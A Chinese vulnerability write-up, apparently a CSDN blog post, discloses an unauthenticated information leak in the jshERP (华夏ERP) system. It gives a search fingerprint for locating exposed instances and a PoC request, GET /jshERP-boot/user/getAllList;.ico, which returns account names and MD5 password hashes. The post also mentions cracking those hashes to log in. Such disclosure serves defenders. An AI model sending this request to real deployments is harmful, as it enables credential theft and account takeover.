华夏ERP getAllList;.ico敏感信息泄露漏洞

这篇文章揭示了基于SpringBoot的华夏ERPSaaS平台存在的信息泄露漏洞,允许通过特定URL获取用户账号密码。漏洞复现方法和使用MD5解密登录的提示给出,建议对相关接口进行访问限制和安全增强。

漏洞描述

华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。

资产测绘

body=“jshERP-boot”

漏洞影响

开源ERP系统jshERP所有版本
在这里插入图片描述

漏洞复现

POC:

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: your_ip
User-Agent
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值